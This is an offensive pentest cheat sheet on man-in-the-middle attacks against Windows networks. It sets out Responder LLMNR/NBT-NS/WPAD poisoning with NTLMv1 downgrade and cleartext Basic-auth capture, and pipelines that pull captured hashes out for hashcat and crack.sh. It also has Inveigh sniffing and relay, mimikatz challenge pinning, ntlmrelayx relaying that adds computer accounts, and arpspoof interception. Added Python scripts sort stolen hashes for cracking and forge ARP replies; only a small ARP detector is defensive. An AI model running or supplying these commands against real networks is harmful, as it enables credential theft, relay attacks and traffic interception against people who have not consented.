MITM

Responder

Set Challenge = 1122334455667788 in /etc/responder/Responder.conf (the fixed server challenge that the crack.sh NTLMv1 tables are built for; the default is Random, and on a git checkout the file sits next to Responder.py instead)

Passive mode (-A only analyses LLMNR/NBT-NS/MDNS queries on the segment, nothing is poisoned)

responder -I <interface> -A

Active mode (-w starts the rogue WPAD proxy, -r also answers NetBIOS wredir suffix queries, -f fingerprints the hosts that query)

responder -I <interface> -wrf

Aggressive mode (-F forces NTLM auth for the WPAD file, -P forces auth on proxy requests, --lm drops ESS from the challenge so clients whose LmCompatibilityLevel allows it answer with LM/NTLMv1)

The first grep keeps the plain NTLMv1 hash strings (user::domain:LMresp:NTresp:challenge, hashcat -m 5500); the second lists every captured hash line including NTLMv1-SSP and NTLMv2-SSP (hashcat -m 5600); the last reduces each NTLMv1 line to user, NT response (field 5) and challenge (field 6). grep -a is needed because Responder's colour codes make the file look binary.

responder -I eth0 -wrf -F -P --lm >> responder.txt
grep -a "NTLMv1 Hash" responder.txt | awk -F ": " '{print $2}'
grep -a "NTLMv" responder.txt | grep Hash
grep -a "NTLMv1 Hash" responder.txt | awk -F ": " '{print $2}' | awk -F ":" '{print $1 "::::" $5 ":" $6}'

Hardcore mode (-b answers with HTTP Basic auth instead of NTLM, so anyone who fills in the browser prompt hands over a cleartext password; -B3 shows the client and username lines Responder prints just before it)

responder -I eth0 -wrfb -F -P --lm >> responder.txt
grep -a -i password responder.txt -B3

NTLM

NTLM MITM attacks

Sniffer (Inveigh; -RunTime is in minutes, -Tool 2 formats output for PowerShell Empire and -Tool 1 for Metasploit's interactive PowerShell)

Invoke-Inveigh -ConsoleOutput Y
Invoke-Inveigh -ConsoleOutput N -RunTime 15 -Tool 2 -LLMNR Y -NBNS Y -StatusOutput Y
Stop-Inveigh

Packets can also be captured natively on the Windows host and the NTLM exchange extracted offline (end the capture with netsh trace stop; convert the .etl with etl2pcapng before opening it in Wireshark; maxSize is in MB)

netsh trace start scenario=NetConnection capture=yes persistent=no maxSize=100 traceFile=C:\NetTrace2.etl

NTLMv1 downgrade attack (https://crack.sh)

On a host already under your control, pin its NTLM server challenge to the fixed 1122334455667788 with mimikatz so that NTLMv1 responses it receives match the crack.sh tables:

misc::easyntlmchall

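
As an added example (not part of the original cheat sheet, not Responder or crack.sh code) tying the grep pipeline from the Aggressive mode section to the fixed challenge above: a Python triage script that reads Responder output, keeps one hash per user, splits the lines into hashcat -m 5500 / -m 5600 inputs and checks which NTLMv1 responses actually qualify for the fixed-challenge (1122334455667788) tables. A response is rejected when the server challenge is not 1122334455667788 or when ESS was negotiated (Responder labels these NTLMv1-SSP and the LM field is an 8-byte client nonce padded with 16 zero bytes), because the DES input is then MD5(challenge || nonce)[:8] rather than the fixed challenge. The log lines, users and hex values are constructed for the demonstration; the NTHASH:<NT response> prefix follows the crack.sh submission format.

```python
import re
from collections import OrderedDict

# Constructed sample of what "responder ... >> responder.txt" writes; the
# usernames and hex responses are made up, not a real capture.
SAMPLE = """\
[*] [LLMNR]  Poisoned answer sent to 10.10.1.15 for name fileserv
[SMB] NTLMv1 Client   : 10.10.1.15
[SMB] NTLMv1 Username : CORP\\alice
[SMB] NTLMv1 Hash     : alice::CORP:1c6ff33c41d0e1f4d1a2d5b2ef3e7b4ea1c8e32a0f2a5c9d:76365e2d142b5612980c67d057eb9efeee5ef6eb6ff6e04d:1122334455667788
[SMB] NTLMv1-SSP Client   : 10.10.1.16
[SMB] NTLMv1-SSP Username : CORP\\bob
[SMB] NTLMv1-SSP Hash     : bob::CORP:3b1c2d4e5f60718200000000000000000000000000000000:2e4c8f1a9b3d5e7f0a1b2c3d4e5f60718293a4b5c6d7e8f9:1122334455667788
[HTTP] NTLMv2-SSP Client   : 10.10.1.17
[HTTP] NTLMv2-SSP Username : CORP\\carol
[HTTP] NTLMv2-SSP Hash     : carol::CORP:1122334455667788:5f9d3e0a1b2c4d6e8f0a1b2c3d4e5f60:0101000000000000c0653150de09b2ca0b5c2a6d11b0b3e10000000002000800430052004f0050
[SMB] NTLMv1 Client   : 10.10.1.15
[SMB] NTLMv1 Username : CORP\\alice
[SMB] NTLMv1 Hash     : alice::CORP:aa6ff33c41d0e1f4d1a2d5b2ef3e7b4ea1c8e32a0f2a5c9d:bb365e2d142b5612980c67d057eb9efeee5ef6eb6ff6e04d:1122334455667788
[SMB] NTLMv1 Client   : 10.10.1.18
[SMB] NTLMv1 Username : CORP\\dave
[SMB] NTLMv1 Hash     : dave::CORP:0f1e2d3c4b5a69788796a5b4c3d2e1f00f1e2d3c4b5a6978:9a8b7c6d5e4f30211203f4e5d6c7b8a99a8b7c6d5e4f3021:0011223344556677
"""

# Responder labels: "NTLMv1 Hash", "NTLMv1-SSP Hash", "NTLMv2-SSP Hash".
HASH_RE = re.compile(r"NTLMv(?P<ver>[12])(?P<ess>-SSP)? Hash\s*:\s*(?P<hash>\S+)")
EASY_CHALLENGE = "1122334455667788"  # what Responder.conf / easyntlmchall pin


def parse_responder_output(text):
    """One dict per hash line, in the order Responder logged them."""
    entries = []
    for line in text.splitlines():
        m = HASH_RE.search(line)
        if not m:
            continue
        fields = m.group("hash").split(":")  # user::domain:...  (fields[1] is empty)
        entry = {"user": fields[0], "domain": fields[2],
                 "version": int(m.group("ver")), "raw": m.group("hash")}
        if entry["version"] == 1:
            lm, nt, chal = fields[3], fields[4], fields[5]
            # ESS: LM field = 8-byte client nonce + 16 zero bytes, so the DES
            # challenge is MD5(server_chal || nonce)[:8], not the fixed value.
            ess = bool(m.group("ess")) or (len(lm) == 48 and lm.endswith("0" * 32))
            entry.update(lm=lm, nt=nt, challenge=chal, ess=ess,
                         table_crackable=(chal.lower() == EASY_CHALLENGE and not ess))
        else:
            entry.update(challenge=fields[3], ntproof=fields[4], blob=fields[5])
        entries.append(entry)
    return entries


def dedupe(entries):
    """Keep the first hash per domain/user/version; Responder logs repeats."""
    seen = OrderedDict()
    for e in entries:
        seen.setdefault((e["domain"].lower(), e["user"].lower(), e["version"]), e)
    return list(seen.values())


def hashcat_lines(entries):
    """Raw lines for hashcat -m 5500 (NTLMv1, ESS handled by hashcat) and -m 5600 (NTLMv2)."""
    v1 = [e["raw"] for e in entries if e["version"] == 1]
    v2 = [e["raw"] for e in entries if e["version"] == 2]
    return v1, v2


def cracksh_lines(entries):
    """NTHASH:<NT response> lines, only for responses the fixed-challenge tables can take."""
    return [f"NTHASH:{e['nt']}" for e in entries
            if e["version"] == 1 and e["table_crackable"]]


def triage(text):
    entries = dedupe(parse_responder_output(text))
    v1, v2 = hashcat_lines(entries)
    rejected = [e["user"] for e in entries if e["version"] == 1 and not e["table_crackable"]]
    return {"v1": v1, "v2": v2, "cracksh": cracksh_lines(entries), "rejected": rejected}


if __name__ == "__main__":
    result = triage(SAMPLE)
    print("hashcat -m 5500:", *result["v1"], sep="\n  ")
    print("hashcat -m 5600:", *result["v2"], sep="\n  ")
    print("crack.sh:", *result["cracksh"], sep="\n  ")
    print("not table-crackable (wrong challenge or ESS):", result["rejected"])
```

Run it against a real responder.txt by replacing SAMPLE with the file contents; the rejected list tells you which NTLMv1 captures still need hashcat rather than the tables (a wrong challenge means the target was not using the pinned value, ESS means the --lm downgrade did not take).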
NTLM Relay

The relay target must not require SMB signing (enabled but not required is fine); the cme command below lists such hosts. Relaying to LDAPS instead needs LDAP channel binding not to be enforced on the DC, and since MS08-068 a session cannot be reflected back to the host it came from.

Invoke-InveighRelay -ConsoleOutput Y -StatusOutput N -Target <ip> -Command "<cmd>" -Attack Enumerate,Execute,Session
cme smb <CIDR> --gen-relay-list smbrelay.txt
ntlmrelayx.py -tf smbrelay.txt -smb2support

Add a computer account over an LDAPS relay, then run a BloodHound collection with it (not tested)

ntlmrelayx.py -t ldaps://<dc_fqdn> --add-computer -smb2support
python bloodhound.py -d <domain> -u <computer>\$ -p '<password>' -c All

Relay and delegation - https://dirkjanm.io/worst-of-both-worlds-ntlm-relaying-and-kerberos-delegation/

ARP Spoofing

Forwarding must be on or the victims lose connectivity the moment they are poisoned, and tcpdump needs -s 0 (full snaplen) to keep whole packets; -S only prints absolute sequence numbers and takes no argument.

Without Gateway (arpspoof with just a host argument claims to be <target> towards every host on the segment, so traffic sent to <target> reaches us)

sysctl -w net.ipv4.ip_forward=1
arpspoof -i eth0 <target>
tcpdump -i eth0 -s 0 -w out.pcap -vv

With Gateway (tells <target> that the gateway is at our MAC; -r poisons the gateway as well so both directions pass through us)

sysctl -w net.ipv4.ip_forward=1
arpspoof -i eth0 -t <target> -r <gateway>
tcpdump -i eth0 -s 0 -w out.pcap -vv
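
As an added example (not part of the original cheat sheet and not arpspoof's code): the two unsolicited ARP replies that the "With Gateway" variant sends, built byte for byte with the standard library, plus the defender-side check that catches them, namely flagging any IP that is advertised from more than one MAC. The MAC and IP addresses are constructed for the demonstration.

```python
import struct
from collections import defaultdict

# Constructed addresses for the demonstration (no real network behind them).
ATTACKER_MAC = "aa:bb:cc:dd:ee:ff"
TARGET_MAC, TARGET_IP = "00:11:22:33:44:55", "10.0.0.20"
GATEWAY_MAC, GATEWAY_IP = "00:aa:bb:cc:dd:01", "10.0.0.1"

ETHERTYPE_ARP = b"\x08\x06"
ARP_REQUEST, ARP_REPLY = 1, 2


def mac_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def ip_bytes(ip):
    return bytes(int(o) for o in ip.split("."))


def ip_str(b):
    return ".".join(str(x) for x in b)


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet II frame carrying an unsolicited ARP reply "sender_ip is at sender_mac",
    the frame arpspoof keeps re-sending to the poisoned host."""
    eth = mac_bytes(target_mac) + mac_bytes(sender_mac) + ETHERTYPE_ARP
    arp = (struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)   # Ethernet/IPv4, 6/4-byte addresses
           + mac_bytes(sender_mac) + ip_bytes(sender_ip)
           + mac_bytes(target_mac) + ip_bytes(target_ip))
    return eth + arp


def parse_arp(frame):
    """Decode an Ethernet II ARP frame into its fields; None if it is not ARP."""
    if len(frame) < 42 or frame[12:14] != ETHERTYPE_ARP:
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    body = frame[22:42]
    return {"op": op,
            "sha": mac_str(body[0:6]), "spa": ip_str(body[6:10]),
            "tha": mac_str(body[10:16]), "tpa": ip_str(body[16:20])}


def poison_frames(attacker_mac, target_mac, target_ip, gateway_mac, gateway_ip):
    """Both directions of "arpspoof -t <target> -r <gateway>": the target is told the
    gateway lives at the attacker's MAC and the gateway is told the same about the
    target, so both halves of the conversation cross the attacker's box."""
    return [build_arp_reply(attacker_mac, gateway_ip, target_mac, target_ip),
            build_arp_reply(attacker_mac, target_ip, gateway_mac, gateway_ip)]


def detect_poisoning(frames, known=None):
    """Defender-side check: any IP advertised from more than one MAC is flagged.
    'known' seeds the table with the inventory (what arpwatch keeps), so a single
    forged reply is enough to raise an alert."""
    claims = defaultdict(set)
    for ip, mac in (known or {}).items():
        claims[ip].add(mac.lower())
    for frame in frames:
        arp = parse_arp(frame)
        if arp is None:
            continue
        claims[arp["spa"]].add(arp["sha"])
    return {ip: sorted(macs) for ip, macs in claims.items() if len(macs) > 1}


if __name__ == "__main__":
    frames = poison_frames(ATTACKER_MAC, TARGET_MAC, TARGET_IP, GATEWAY_MAC, GATEWAY_IP)
    for f in frames:
        print(parse_arp(f))
    print(detect_poisoning(frames, {GATEWAY_IP: GATEWAY_MAC, TARGET_IP: TARGET_MAC}))
```

Feed detect_poisoning the ARP frames pulled out of out.pcap (or a live sniffer) together with a known-good table and it will report the IPs with two competing MACs; the attack's own frames are the ones whose sender MAC is not the inventory's.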